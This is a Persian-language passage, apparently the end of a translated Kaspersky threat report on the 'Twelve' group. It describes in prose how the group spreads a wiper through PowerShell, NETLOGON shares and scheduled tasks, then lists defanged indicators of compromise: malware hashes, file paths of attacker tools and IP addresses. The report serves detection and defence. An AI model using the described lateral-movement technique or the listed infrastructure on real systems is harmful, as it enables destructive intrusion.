الگوی پخش وایپر در زیرساخت قربانی تقریباً تفاوتی با الگوی باج افزار ندارد. دشمن از PowerShell برای کپی کردن فایل پاک کن در اشتراک شبکه نت لاگ استفاده نموده  و سپس اسکریپتی را اجرا می‌کند که خط مشی‌های گروه را تغییر داده و وظایف برنامه‌ریزی شده را ایجاد می‌کند. سپس وایپر از اشتراک شبکه نت لاگ در پوشه محلی ProgramData در تمام رایانه‌های دامنه رمزگذاری شده قبلی کپی می‌شود. پس از این، یک کار برنامه ریزی شده شروع می‌شود و وایپر را اجرا نموده که داده‌های دستگاه را از بین می برد.

اهداف

اهداف استراتژیک عامل تهدید:

• از بین بردن دارایی‌های حیاتی و مختل کردن کسب و کار؛
• سرقت اطلاعات حساس؛
• بی‌اعتبار کردن قربانیان با گزارش دستکاری در کانال تلگرام مهاجمین

برداشت‌ها

دوازده بیشتر از اینکه به دنبال آورده مالی باشد درگیر ماجرای هک بود. این نشان‌دهنده شیوه کاری‌اش است: به جای درخواست باج برای رمزگشایی داده، دوازده ترجیح ی‌دهد داده‌های قربانی را رمزگذاری کرده و بعد زیرساخت آن‌ها را با وایپر خراب کند تا جلوی ریکاوری گرفته شود. این رویکرد نشانگر علاقه دوازده به ایجاد بالاترین حد خسارت به سازمان هدف است بدون اینکه ذره‌ای پای سود مستقیم مالی در میان باشد. تجزیه و تحلیل ما همچنین نشان می‌دهد که این گروه به زرادخانه‌ای از ابزارهای بدافزاری که در دسترس عموم و آشنا هستند، پایبند است، که نشان می‌دهد هیچ‌کدام از آنها را نمی‌سازد. این امر تشخیص و جلوگیری از حملات Twelve را در زمان مناسب ممکن می‌سازد. عدم انجام این کار می‌تواند منجر به آسیب دیدن زیرساخت های سازمان از سوی عامل تهدید شود.

شاخص‌های دستکاری

وب‌شل‌ها

05d80c987737e509ba8e6c086df95f7d
48b2e5c49f121d257b35ba599a6cd350
5dcd02bda663342b5ddea2187190c425
97aac7a2f0d2f4bdfcb0e8827a111524
dad076c784d9fcbc506c1e614aa27f1c
ecb14e506727ee67220e87ced2e6781a
f8da1f02aa64e844770e447709cdf679

Mimikatz

e930b05efe23891d19bc354a4209be3e

اسکریپت‌ها

7a7c0a521b7596318c7cd86582937d98
72830102884c5ebccf2afbd8d9a9ed5d
31014add3cb96eee557964784bcf8fde
7dfa50490afe4553fa6889bdafda7da2

Ngrok
43b3520d69dea9b0a27cce43c1608cad

Cobalt Strike
7bec3c59d412f6f394a290f95975e21f

Ransomware
9c74401a28bd71a87cdf5c17ad1dffa5      
d813f5d37ab2feed9d6a2b7d4d5b0461      
646a228c774409c285c256a8faa49bde      
5c46f361090620bfdcac6afce1150fae      
9bd78bcf75b9011f9d7a9a6e5aee5bf6      
f90e95b9fcab4c1b08ca06bc2c2d6e40      
39b91f5dfbbec13a3ec7cce670cf69ad     

وایپر
4bff90a6f7bafc8e719e8cab87ab1766      

مسیرهای فایل
C:\ProgramData\sed.exe
C:\Users\{username}\Downloads\sed.exe
C:\Users\{username}\Desktop\sed.exe
C:\programdata\svchost\svchost.exe
C:\programdata\svchost\svchost.yml
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.exe
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.yml
C:\Users\{username}\Desktop\svchost.exe
C:\Users\{username}\Desktop\svchost.yml
C:\users\{username}\pictures\photos_delo\loop.exe
C:\users\{username}\downloads\chisel_1.9.1_windows_amd64\chisel.exe
C:\Users\{username}\Documents\PowerView.ps1
C:\Users\{username}\Documents\calculator.exe
C:\Windows\qbkLIdag.exe
C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate
C:\Windows\SYSVOL\domain\scripts\intel.exe
C:\Windows\SYSVOL\domain\scripts\outlookconf2003.ps1
C:\Windows\SYSVOL\domain\scripts\ZZZZZZ
C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe
\\[DOMAIN]\netlogon\12.exe
\\[DOMAIN]\netlogon\outlookconf2003.ps1
\\[DOMAIN]\netlogon\intel.exe
C:\123\12.exe
C:\ProgramData\intel.exe
C:\Users\Public\46a2209036e6282c45f8dfd3f046033d.ps1
C:\Users\Public\gpo.ps1
C:\Windows\Logs\PsExec.exe

دامنه‌ها و آی‌پی‌ها
212.109[.]217.88
195.2[.]79.195
109.205[.]56.229
193.110[.]79.47
195.2[.]79.195
217.148[.]143.196
5.8[.]16.147
5.8[.]16.148
5.8[.]16.149
5.8[.]16.169
5.8[.]16.170
5.8[.]16.236
5.8[.]16.238
79.137[.]69.34
85.204[.]124.94
89.238[.]132.68
89.33[.]8.198
91.90[.]121.220

 

[1] confidentiality, integrity and availability

کسپرسکی آنلاین (ایدکو)

کسپرسکی اسم یکی از بزرگترین شرکتهای امنیتی و سازنده آنتی ویروس است که برخی از کاربران اشتباهاً این شرکت و محصولات آنتی ویروس آن را با عناوینی نظیر کسپرسکای،کاسپرسکی، کسپراسکای، کسپراسکای، و یا کاسپراسکای نیز می‌شناسد. همچنین لازم به ذکر است مدیرعامل این شرکت نیز یوجین کسپرسکی نام دارد.